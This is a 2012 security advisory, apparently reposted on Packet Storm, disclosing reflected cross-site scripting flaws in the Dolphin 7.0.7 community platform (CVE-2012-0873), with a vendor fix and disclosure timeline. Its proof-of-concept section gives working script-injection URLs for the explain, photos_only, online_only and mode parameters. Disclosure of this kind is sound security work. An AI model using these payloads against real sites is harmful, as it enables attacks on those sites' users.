what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Dolphin 7.0.7 Cross Site Scripting

Dolphin 7.0.7 Cross Site Scripting
Posted Feb 21, 2012
Authored by Aung Khant | Site yehg.net

Dolphin versions 7.0.7 and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2012-0873
SHA-256 | 95f4fc70939e0108f5a380847704c47d500eeee1222de22488569f5b28e61a8f

Dolphin 7.0.7 Cross Site Scripting

Change Mirror Download
1. OVERVIEW

Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Dolphin is the only "all-in-one" free community software platform for
creating your own social networking, community or online dating site
without any limits and under your full control. Dolphin comes with
hundreds of features, module plugins and tools. Everything is included
and extension posibilities are literally endless. You can use it for
free with a BoonEx link in the footer or buy a $99 permanent license
to remove that requirement.


3. VULNERABILITY DESCRIPTION

Multiple parameters (explain,photos_only,online_only,mode) were not
properly sanitized, which allows attacker to conduct Cross Site
Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's
browser.


4. VERSIONS AFFECTED

7.0.7 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

Vulnerable Parameter: explain

http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E


Vulnerable Parameters: photos_only,online_only,mode

http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='"><script>alert(/xss/)</script>

http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='"><script>alert(/xss/)</script>

http://localhost/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='"><script>alert(/xss/)</script>


6. SOLUTION

Upgade to the latest version of Dolphine.


7. VENDOR

BoonEx Pty Ltd
http://www.boonex.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2011-10-24: fixed version, 7.0.8, released
2012-02-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss
BoonEx Home Page: http://www.boonex.com/


#yehg [2012-02-20]
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close